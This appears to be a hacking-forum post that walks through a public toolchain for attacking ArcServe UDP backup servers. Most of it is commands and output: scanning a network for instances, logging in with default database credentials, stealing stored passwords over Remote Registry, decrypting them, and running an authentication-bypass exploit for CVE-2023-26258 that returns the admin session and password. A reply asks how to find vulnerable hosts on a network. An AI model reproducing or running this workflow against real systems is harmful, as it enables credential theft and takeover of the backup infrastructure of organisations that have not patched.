
Local CVE-2023-26258

Zodiac

If you are in the network you can scan for instances configured by default using ArcServeRadar.py. I tried to port it to C# but couldn't, feel free to do it if you know how :)

Code:
c:\Users\vagrant\Desktop>python ArcServeRadar.py "Ethernet 2" 6969 192.168.56.20

                -=[ ArcServe Finder - @TheXC3LL  - MDSec ]=-

[*] Starting to monitor

[*] Broadcasting

WARNING: Mac address to reach destination not found. Using broadcast.

        [+] 192.168.56.10 => ServerName;KINGSLANDING;InstanceName;ARCSERVE_APP;IsClustered;No;Version;15.0.2000.5;tcp;62197;;


If it is configured by default you can use default DB creds to connect to the IP and port obtained before and read the username/password plus where the ArcServe instances are located using ArcServe-dbpwner.py:

Code:
psyconauta@insulanova:/tmp|⇒  python3 arcserve-dbpwn.py -target 192.168.56.10 -port 62197
        -=[ ArcServe credential retriever (from DB) - Juan Manuel Fernandez (@TheXC3LL)  - MDSec]=-


[*] Connecting to the server
[*] Login with default creds
[*] Extracting credentials:
    [+] User: SEVENKINGDOMS\vagrant
    [+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
    [+] User: SEVENKINGDOMS\vagrant
    [+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[*] Finding hosts:
    [+] 192.168.56.10 | kingslanding.sevenkingdoms.local | Windows Server 2019 Datacenter Evaluation
    [+] 192.168.56.10 | kingslanding.sevenkingdoms.local | NULL


 Have a nice day! ^_^



All the passwords retrieved by the tools can be decrypted using ArcServeDecrypter.exe. Just edit the C code to add the array, compile and execute it:

Code:
C:\Users\vagrant>C:\Users\vagrant\source\repos\ArcServeDecrypter\x64\Debug\ArcServeDecrypter.exe
                -={ ArcServe Decryptor by Juan Manuel Fernandez (@TheXC3LL) - MDSec}=-

[+] Decrypted string: vagrant



If you have a user with local admin privileges on the server where ArcServe is installed, you can read the credentials using the Remote Registry service (arcserve-regkeys.py):

Code:
psyconauta@insulanova:/tmp|⇒  python3 arcserve-creds.py -u eddard.stark -p 'FightP3aceAndHonor!' -d sevenkingdoms.local -target-ip 192.168.56.20
        -=[ ArcServe Credential Stealer - (@TheXC3LL) - MDSec]=-
[+] Connecting to 192.168.56.20
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Opening registry key
    [*] User: P3TWLADS11STD\vagrant
    [*] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[+] Stopping Remote Registry Service

Have a nice day! ^_^



Finally, if the ArcServe version was not patched (CVE-2023-26258) you can exploit an authentication bypass in the management web interface and retrieve the admin creds (ArcServe-exploit.py):

Code:
psyconauta@insulanova:/tmp|⇒  python3 exploit.py 192.168.56.10
        -=[ ArcServe Pwner by Juan Manuel Fernandez (@TheXC3LL) - MDSec]=-


[*] Triggering info leak
    [+] AdminName: SEVENKINGDOMS\vagrant
    [+] AuthUUID: 6bf37b8e-ac4f-487d-8d74-d6d0a8d9b8d1
[*] Getting a valid session
    [+] Session: AGENTJSESSIONID=CA35EF18A4FF2F85E25538F60C3F7428
[*] Doing an authenticated request to validate if session is valid
[*] Session is valid
    [+] Admin: SEVENKINGDOMS\vagrant
    [+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98} // Paste it to the decrypter


Have a happy hacking! ^_^

So here ends the summary of tools that you can find here.


URL - https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe

even nighthawks talk about it - https://www.mdsec.co.uk/2023/06/cve-2023-26258-remote-code-execution-in-arcserve-udp-backup/
 
how to scan for it in network? for what port?
psyconauta@insulanova:/tmp|⇒ python3 arcserve-dbpwn.py -target 192.168.56.10 -port 62197

As you can see in this example, they used port number 62197, but again it can be changed. So we have to perform a good search in the grid to identify it.
 

